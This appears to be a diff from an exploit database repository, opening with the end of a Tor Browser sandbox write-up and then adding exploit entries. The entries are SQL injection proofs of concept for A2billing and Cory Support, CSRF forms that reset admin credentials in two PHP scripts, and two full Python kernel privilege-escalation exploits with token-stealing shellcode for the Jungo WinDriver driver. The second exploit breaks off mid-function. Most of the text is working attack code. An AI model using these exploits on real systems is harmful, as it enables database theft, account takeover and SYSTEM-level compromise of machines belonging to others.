The blog post <https://blog.torproject.org/blog/tor-browser-70-released> talks about the Firefox content process sandbox, which is still in development and unrelated to the Tor-specific sandbox I looked at. So the "content sandboxing" the blog post talks about isn't very effective yet; the Mozilla wiki points to multiple bug lists that document the remaining work (https://wiki.mozilla.org/Security/Sandbox#Bug_Lists).
The sandbox I looked at here is written and distributed by the Tor Project.
https://gitweb.torproject.org/tor-browser/sandboxed-tor-browser.git/commit/?id=1bfbd7cc1cd60c9468f2e33a3d4816973f1fb2f5 was added to mitigate the issue I reported by filtering X11 traffic and whitelisting permitted X protocol extensions.
More warnings have been added to the corresponding documentation (https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux?action=diff&version=23&old_version=21) that point out that this sandbox should not be used without manually configuring nested X11 and that pulseaudio is unsafe.
*/

0
platforms/linux/remote/10.c → platforms/multiple/remote/10.c
View file

45
platforms/php/webapps/42615.txt Executable file
View file

@ -0,0 +1,45 @@
# Title : A2billing 2.x , Sql injection vulnerability
# Vulnerable software : A2billing 2.x
# Author : Ahmed sultan (0x4148)
# Email : 0x4148@gmail.com
# Linkedin : https://www.linkedin.com/in/0x4148/
If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/
A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID
The sanitization proccess differ from version to another , but the concept is the same ,
I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications
File : agent/public/checkout_process.php
getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency',
'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency',
'transaction_id', 'mc_fee', 'card_number'));
...................................................
// Status - New 0 ; Proceed 1 ; In Process 2
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner,
cc_number, cc_expires, creationdate, status, cvv, credit_card_type,
currency " .
" FROM cc_epayment_log_agent " .
" WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND
$NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
POC :
Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
to : https://HOST/a2billing/agent/Public/checkout_process.php
will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection
Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA
Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release
Full exploit code is attached <loose code for demonstration purposes only>
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42615.zip
Thanks fly to R1z clan :)

38
platforms/php/webapps/42620.txt Executable file
View file

@ -0,0 +1,38 @@
# Exploit : Cory Support (pr) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : September, 06-2017 GMT +7:00 Jakarta, Indonesia
# Developer : Cory App
# Software : Cory Support
# App Link : http://coryapp.com/?product&index
# Demo : http://coryapp.com/demo/support/
# Tested On : Mac OS Sierra v10.12.6
# Credits : YOGYACARDERLINK, Dhea Dayanaya Fathin Karima, Don't Touch Me (Line Group) & Muhammad Panji, Alfath Dirk, Cafe BMW & YOU !!
1. Description
An attacker can exploit this vulnerability to read from the database.
The parameter 'pr' is vulnerable.
2. Proof of Concept
http://domain.tld/[path]/listfaq.php?pr=9999+and+1=2+union+all+select+null,version()--
# Exploitation via SQLMap
Parameter: pr (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pr=1 AND 4809=4809
Vector: AND [INFERENCE]
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: pr=1 UNION ALL SELECT NULL,CONCAT(0x7170706271,0x564f724b4475754c4c7a48714c59464c6c43704a636c6f72444471767a79716a6b6d4d6a72654b76,0x7170626b71)-- RNyi
Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
3. Security Risk
The security risk of the remote sql-injection web vulnerability in the Cory Support is estimated as high.

30
platforms/php/webapps/42621.html Executable file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html
# Demo: http://dijiteol.com/demos/advertiz/
# Version: 0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #

30
platforms/php/webapps/42622.html Executable file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin User&Pass)
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
<html>
<body>
<form method="post" action="http://localhost/[PATH]/admin/editpersonal.php">
<!--Change admin username-->
<input name="login" type="text" size="20" maxlength="15" value="admin">
<!--Change admin password-->
<input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe">
<input type="submit" name="Submit" value="Update">
</form>
</body>
</html>
# # # # #

28
platforms/php/webapps/42623.txt Executable file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Pay Banner Text Link Ad 1.0.6.1 - SQL Injection
# Dork: N/A
# Date: 06.09.2017
# Vendor Homepage: http://www.dijiteol.com/
# Software Link: http://www.dijiteol.com/p-Pay-Banner-Textlink-Ad-Pay-Banner-Advertisement-PHP-Script-i-1.html
# Demo: http://dijiteol.com/demos/pbtla
# Version: 1.0.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?action=stats&id=[SQL]
#
# http://localhost/[PATH]/index.php?action=previewad&id=[SQL]
#
# Etc..
# # # # #

3
platforms/unix/remote/22356.c
View file

@ -1,7 +1,8 @@
/*
source: http://www.securityfocus.com/bid/7106/info
Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.
Samba is prone to a buffer-overflow vulnerability when the '
' service tries to reassemble specially crafted SMB/CIFS packets.
An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values.

410
platforms/windows/local/42624.py Executable file
View file

@ -0,0 +1,410 @@
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability
Download: http://www.jungo.com/st/products/windriver/
File: WD1240.EXE
Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver: windrvr1240.sys
Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE: CVE-2017-14153
Author: Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks: b33f, ryujin and sickness
Analysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html
Summary:
========
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
Timeline:
=========
2017-08-22 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 No response from Jungo and two bounced emails
2017-08-26 Attempted a follow up with the vendor via website chat
2017-08-26 No response via the website chat
2017-09-03 Recieved an email from a Jungo representative stating that they are "looking into it"
2017-09-03 Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 No response from Jungo
2017-09-06 Public 0day release of advisory
Example:
========
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Mandatory Label\Low Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Guest\Desktop>whoami
debugee\guest
C:\Users\Guest\Desktop>poc.py
--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
Steven Seeley (mr_me) of Source Incite
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Guest\Desktop>whoami
nt authority\system
C:\Users\Guest\Desktop>
"""
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time
from platform import release, architecture
ntdll = windll.ntdll
kernel32 = windll.kernel32
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0x0
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_INVALID_HANDLE = 0xC0000008
SystemExtendedHandleInformation = 64
class LSA_UNICODE_STRING(Structure):
"""Represent the LSA_UNICODE_STRING on ntdll."""
_fields_ = [
("Length", USHORT),
("MaximumLength", USHORT),
("Buffer", LPWSTR),
]
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
"""Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
_fields_ = [
("Object", c_void_p),
("UniqueProcessId", ULONG),
("HandleValue", ULONG),
("GrantedAccess", ULONG),
("CreatorBackTraceIndex", USHORT),
("ObjectTypeIndex", USHORT),
("HandleAttributes", ULONG),
("Reserved", ULONG),
]
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
"""Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
_fields_ = [
("NumberOfHandles", ULONG),
("Reserved", ULONG),
("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
]
class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
"""Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
_fields_ = [
("Name", LSA_UNICODE_STRING),
("Reserved", ULONG * 22),
]
class PROCESSENTRY32(Structure):
_fields_ = [
("dwSize", c_ulong),
("cntUsage", c_ulong),
("th32ProcessID", c_ulong),
("th32DefaultHeapID", c_int),
("th32ModuleID", c_ulong),
("cntThreads", c_ulong),
("th32ParentProcessID", c_ulong),
("pcPriClassBase", c_long),
("dwFlags", c_ulong),
("szExeFile", c_wchar * MAX_PATH)
]
Process32First = kernel32.Process32FirstW
Process32Next = kernel32.Process32NextW
def signed_to_unsigned(signed):
"""
Convert signed to unsigned integer.
"""
unsigned, = struct.unpack ("L", struct.pack ("l", signed))
return unsigned
def get_type_info(handle):
"""
Get the handle type information to find our sprayed objects.
"""
public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
size = DWORD(sizeof(public_object_type_information))
while True:
result = signed_to_unsigned(
ntdll.NtQueryObject(
handle, 2, byref(public_object_type_information), size, None))
if result == STATUS_SUCCESS:
return public_object_type_information.Name.Buffer
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(public_object_type_information, size.value)
elif result == STATUS_INVALID_HANDLE:
return None
else:
raise x_file_handles("NtQueryObject.2", hex (result))
def get_handles():
"""
Return all the processes handles in the system at the time.
Can be done from LI (Low Integrity) level on Windows 7 x86.
"""
system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
size = DWORD (sizeof (system_handle_information))
while True:
result = ntdll.NtQuerySystemInformation(
SystemExtendedHandleInformation,
byref(system_handle_information),
size,
byref(size)
)
result = signed_to_unsigned(result)
if result == STATUS_SUCCESS:
break
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(system_handle_information, size.value)
else:
raise x_file_handles("NtQuerySystemInformation", hex(result))
pHandles = cast(
system_handle_information.Handles,
POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
system_handle_information.NumberOfHandles)
)
for handle in pHandles.contents:
yield handle.UniqueProcessId, handle.HandleValue, handle.Object
def we_can_alloc_shellcode():
"""
This function allocates the shellcode @ the null page making
sure the new OkayToCloseProcedure pointer points to shellcode.
"""
baseadd = c_int(0x00000004)
null_size = c_int(0x1000)
tokenstealing = (
"\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x50\x8B\xC8\x8B\x80"
"\xB8\x00\x00\x00\x2D\xB8\x00\x00\x00\x83\xB8\xB4\x00\x00\x00\x04"
"\x75\xEC\x8B\x90\xF8\x00\x00\x00\x89\x91\xF8\x00\x00\x00\xC2\x10"
"\x00" )
OkayToCloseProcedure = struct.pack("<L", 0x00000078)
sc = "\x42" * 0x70 + OkayToCloseProcedure
# first we restore our smashed TypeIndex
sc += "\x83\xC6\x0c" # add esi, 0c
sc += "\xc7\x06\x0a\x00\x08\x00" # mov [esi], 8000a
sc += "\x83\xee\x0c" # sub esi, 0c
sc += tokenstealing
sc += "\x90" * (0x400-len(sc))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(null_size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) error while allocating the null paged memory: %s" % dwStatus
return False
written = c_ulong()
write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))
if write == 0:
print "(-) error while writing our junk to the null paged memory: %s" % write
return False
return True
def we_can_spray():
"""
Spray the Kernel Pool with IoCompletionReserve and Event Objects.
The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
These are allocated from the Nonpaged kernel pool.
"""
handles = []
IO_COMPLETION_OBJECT = 1
for i in range(0, 25000):
handles.append(windll.kernel32.CreateEventA(0,0,0,0))
hHandle = HANDLE(0)
handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))
# could do with some better validation
if len(handles) > 0:
return True
return False
def alloc_pool_overflow_buffer(base, input_size):
"""
Craft our special buffer to trigger the overflow.
"""
print "(+) allocating pool overflow input buffer"
baseadd = c_int(base)
size = c_int(input_size)
input = "\x41" * 0x18 # offset to size
input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow)
input += "\x42" * (0x90-len(input)) # padding to survive bsod
input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA
input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer
# repair the allocated chunk header...
input += struct.pack("<I", 0x040c008c) # _POOL_HEADER
input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount)
input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock)
input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)
# filler
input += "\x44" * (input_size-len(input))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
return False
written = c_ulong()
write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
if write == 0:
print "(-) error while writing our input buffer memory: %s" % write
return False
return True
def we_can_trigger_the_pool_overflow():
"""
This triggers the pool overflow vulnerability using a buffer of size 0x460.
"""
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE_NAME = "\\\\.\\WinDrvr1240"
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
inputbuffer = 0x41414141
inputbuffer_size = 0x5000
outputbuffer_size = 0x5000
outputbuffer = 0x20000000
alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
IoStatusBlock = c_ulong()
if driver_handle:
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,
inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
return True
return False
def we_can_make_pool_holes():
"""
This makes the pool holes that will coalesce into a hole of size 0x460.
"""
global khandlesd
mypid = os.getpid()
khandlesd = {}
khandlesl = []
# leak kernel handles
for pid, handle, obj in get_handles():
# mixed object attack
if pid == mypid and (get_type_info(handle) == "Event" or get_type_info(handle) == "IoCompletionReserve"):
khandlesd[obj] = handle
khandlesl.append(obj)
# Find holes and make our allocation
holes = []
for obj in khandlesl:
# obj address is the handle address, but we want to allocation
# address, so we just remove the size of the object header from it.
alloc = obj - 0x30
# Get allocations at beginning of the page
if (alloc & 0xfffff000) == alloc:
bin = []
# object sizes
CreateEvent_size = 0x40
IoCompletionReserve_size = 0x60
combined_size = CreateEvent_size + IoCompletionReserve_size
# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object
offset = IoCompletionReserve_size
for i in range(offset, offset + (7 * combined_size), combined_size):
try:
# chunks need to be next to each other for the coalesce to take effect
bin.append(khandlesd[obj + i])
bin.append(khandlesd[obj + i - IoCompletionReserve_size])
except KeyError:
pass
# make sure it's contiguously allocated memory
if len(tuple(bin)) == 14:
holes.append(tuple(bin))
# make the holes to fill
for hole in holes:
for handle in hole:
kernel32.CloseHandle(handle)
return True
def trigger_lpe():
"""
This function frees the IoCompletionReserve objects and this triggers the
registered aexit, which is our controlled pointer to OkayToCloseProcedure.
"""
# free the corrupted chunk to trigger OkayToCloseProcedure
for k, v in khandlesd.iteritems():
kernel32.CloseHandle(v)
os.system("cmd.exe")
def main():
print "\n\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]"
print "\t Steven Seeley (mr_me) of Source Incite\r\n"
if release() != "7" or architecture()[0] != "32bit":
print "(-) although this exploit may work on this system,"
print " it was only designed for Windows 7 x86."
sys.exit(-1)
print "(+) spraying pool with mixed objects..."
if we_can_spray():
print "(+) sprayed the pool!"
print "(+) making pool holes..."
if we_can_make_pool_holes():
print "(+) made the pool holes!"
print "(+) allocating shellcode..."
if we_can_alloc_shellcode():
print "(+) allocated the shellcode!"
print "(+) triggering pool overflow..."
if we_can_trigger_the_pool_overflow():
print "(+) elevating privileges!"
trigger_lpe()
if __name__ == '__main__':
main()

320
platforms/windows/local/42625.py Executable file
View file

@ -0,0 +1,320 @@
# -*- coding: utf-8 -*-
"""
Jungo DriverWizard WinDriver Kernel Out-of-Bounds Write Privilege Escalation Vulnerability
Download: http://www.jungo.com/st/products/windriver/
File: WD1240.EXE
Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba
Driver: windrvr1240.sys
Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
CVE: CVE-2017-14075
Author: Steven Seeley (mr_me) of Source Incite
Affected: <= v12.4.0
Thanks: b33f and sickness
Summary:
========
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the processing of IOCTL 0x953824a7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in an out-of-bounds write condition. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
Vulnerability:
==============
The vulnerability occurs in sub_405644 at loc_4056CD:
.text:004056CD loc_4056CD: ; CODE XREF: sub_405644+6A
.text:004056CD mov eax, [ebx]
.text:004056CF xor edx, edx
.text:004056D1 mov byte ptr [edi+eax], 0 ; null byte write
.text:004056D5 mov eax, P
.text:004056DA add [eax+880h], edi ; offset HalDispatchTable[1]+0x880 is null and writable
Exploitation:
=============
At 0x004056da there is a second write, but since HalDispatchTable[1]+0x880 points to a null dword that is in a writable location, no memory is modified outside of out null byte write (0x004056d1).
Since we can do that, we can keep calling the vuln ioctl code and push down the kernel pointer from HalDispatchTable[1] to reach userland. We could have just done 2 bytes, but I choose 3 for reliability.
Finally, the shellcode repairs the HalDispatchTable[1] pointer by reading HalDispatchTable[2] and calculating the offset to the HalDispatchTable[1] pointer and then re-writes the correct pointer back into the HalDispatchTable.
Timeline:
=========
2017-08-22 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
2017-08-25 No response from Jungo and two bounced emails
2017-08-26 Attempted a follow up with the vendor via website chat
2017-08-26 No response via the website chat
2017-09-03 Recieved an email from a Jungo representative stating that they are "looking into it"
2017-09-03 Requested a timeframe for patch development and warned of possible 0day release
2017-09-06 No response from Jungo
2017-09-06 Public 0day release of advisory
Example:
========
C:\Users\Guest\Desktop>icacls poc.py
poc.py NT AUTHORITY\Authenticated Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Mandatory Label\Low Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Guest\Desktop>whoami
debugee\guest
C:\Users\Guest\Desktop>poc.py
--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
Steven Seeley (mr_me) of Source Incite
(+) spraying pool with mixed objects...
(+) sprayed the pool!
(+) making pool holes...
(+) made the pool holes!
(+) allocating shellcode...
(+) allocated the shellcode!
(+) triggering pool overflow...
(+) allocating pool overflow input buffer
(+) elevating privileges!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Guest\Desktop>whoami
nt authority\system
C:\Users\Guest\Desktop>
"""
import os
import sys
import struct
from ctypes import *
from ctypes.wintypes import *
from platform import release, architecture
kernel32 = windll.kernel32
ntdll = windll.ntdll
# GLOBAL VARIABLES
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
class SYSTEM_MODULE_INFORMATION(Structure):
_fields_ = [("Reserved", c_void_p * 3), # this has an extra c_void_p because the first 4 bytes = number of return entries.
("ImageBase", c_void_p), # it's not actually part of the structure, but we are aligning it.
("ImageSize", c_ulong),
("Flags", c_ulong),
("LoadOrderIndex", c_ushort),
("InitOrderIndex", c_ushort),
("LoadCount", c_ushort),
("ModuleNameOffset", c_ushort),
("FullPathName", c_char * 256)]
def alloc_shellcode(base, input_size, HalDispatchTable1):
"""
allocates some shellcode
"""
print "(+) allocating shellcode @ 0x%x" % base
baseadd = c_int(base)
size = c_int(input_size)
# get the repair address
HalDispatchTable2 = struct.pack("<I", HalDispatchTable1+0x4)
# --[ setup]
input = "\x60" # pushad
input += "\x64\xA1\x24\x01\x00\x00" # mov eax, fs:[KTHREAD_OFFSET]
input += "\x8B\x40\x50" # mov eax, [eax + EPROCESS_OFFSET]
input += "\x89\xC1" # mov ecx, eax (Current _EPROCESS structure)
input += "\x8B\x98\xF8\x00\x00\x00" # mov ebx, [eax + TOKEN_OFFSET]
# --[ copy system PID token]
input += "\xBA\x04\x00\x00\x00" # mov edx, 4 (SYSTEM PID)
input += "\x8B\x80\xB8\x00\x00\x00" # mov eax, [eax + FLINK_OFFSET] <-|
input += "\x2d\xB8\x00\x00\x00" # sub eax, FLINK_OFFSET |
input += "\x39\x90\xB4\x00\x00\x00" # cmp [eax + PID_OFFSET], edx |
input += "\x75\xed" # jnz ->|
input += "\x8B\x90\xF8\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET]
input += "\x89\x91\xF8\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx
# --[ recover]
input += "\xbe" + HalDispatchTable2 # mov esi, HalDispatchTable[2]
input += "\x8b\x16" # mov edx, [esi]
input += "\x81\xea\x12\x09\x00\x00" # sub edx, 0x912
input += "\x83\xee\x04" # sub esi, 0x4
input += "\x89\x16" # mov [esi], edx
input += "\x61" # popad
input += "\xC3" # ret
input += "\xcc" * (input_size-len(input))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
return False
written = c_ulong()
write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
if write == 0:
print "(-) Error while writing our input buffer memory: %s" % write
return False
return True
def alloc(base, input_size):
"""
Just allocates things.
"""
baseadd = c_int(base)
size = c_int(input_size)
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
return False
return True
def mymemset(base, location, size):
"""
A cheap memset ¯\_()_/¯
"""
input = location * (size/len(location))
written = c_ulong()
write = kernel32.WriteProcessMemory(0xFFFFFFFF, base, input, len(input), byref(written))
if write == 0:
print "(-) Error while writing our input buffer memory: %s" % write
return False
return True
def get_HALDispatchTable_kernel_address():
"""
This function gets the HALDispatchTable's kernel address
"""
# allocate arbitrary buffer and call NtQuerySystemInformation
b = create_string_buffer(0)
systeminformationlength = c_ulong(0)
res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
# call NtQuerySystemInformation second time with right size
b = create_string_buffer(systeminformationlength.value)
res = ntdll.NtQuerySystemInformation(11, b, len(b), byref(systeminformationlength))
# marshal raw bytes for 1st entry
smi = SYSTEM_MODULE_INFORMATION()
memmove(addressof(smi), b, sizeof(smi))
# get kernel image name
kernelImage = smi.FullPathName.split('\\')[-1]
print "(+) found %s kernel base address: 0x%x" % (kernelImage, smi.ImageBase)
# load kernel image in userland and get HAL Dispatch Table offset
hKernelImage = kernel32.LoadLibraryA(kernelImage)
print "(+) loading %s in userland" % kernelImage
print "(+) found %s Userland Base Address : 0x%x" % (kernelImage, hKernelImage)
hdt_user_address = kernel32.GetProcAddress(hKernelImage,"HalDispatchTable")
print "(+) found HalDispatchTable userland base address: 0x%x" % hdt_user_address
# calculate HAL Dispatch Table offset in kernel land
hdt_kernel_address = smi.ImageBase + ( hdt_user_address - hKernelImage)
print "(+) found HalDispatchTable kernel base address: 0x%x" % hdt_kernel_address
return hdt_kernel_address
def write_one_null_byte(HWD, in_buffer, location):
"""
The primitive function
"""
mymemset(in_buffer, location, 0x1000)
if HWD:
IoStatusBlock = c_ulong()
dev_ioctl = ntdll.ZwDeviceIoControlFile(HWD,
None,
None,
None,
byref(IoStatusBlock),
0x953824a7, # target
in_buffer, # special buffer
0x1000, # just the size to trigger with
0x20000000, # whateva
0x1000 # whateva
)
# we could check dev_ioctl here I guess
return True
return False
def we_can_elevate(h, in_buffer, base):
"""
This just performs the writes...
"""
# get location of first byte write
where2write = struct.pack("<I", base + 0x3)
print "(+) triggering the first null byte write..."
if write_one_null_byte(h, in_buffer, where2write):
# get the location of the second byte write
where2write = struct.pack("<I", base + 0x2)
print "(+) triggering the second null byte write..."
if write_one_null_byte(h, in_buffer, where2write):
# get the location of the third byte write
where2write = struct.pack("<I", base + 0x1)
print "(+) triggering the third null byte write..."
if write_one_null_byte(h, in_buffer, where2write):
# eop
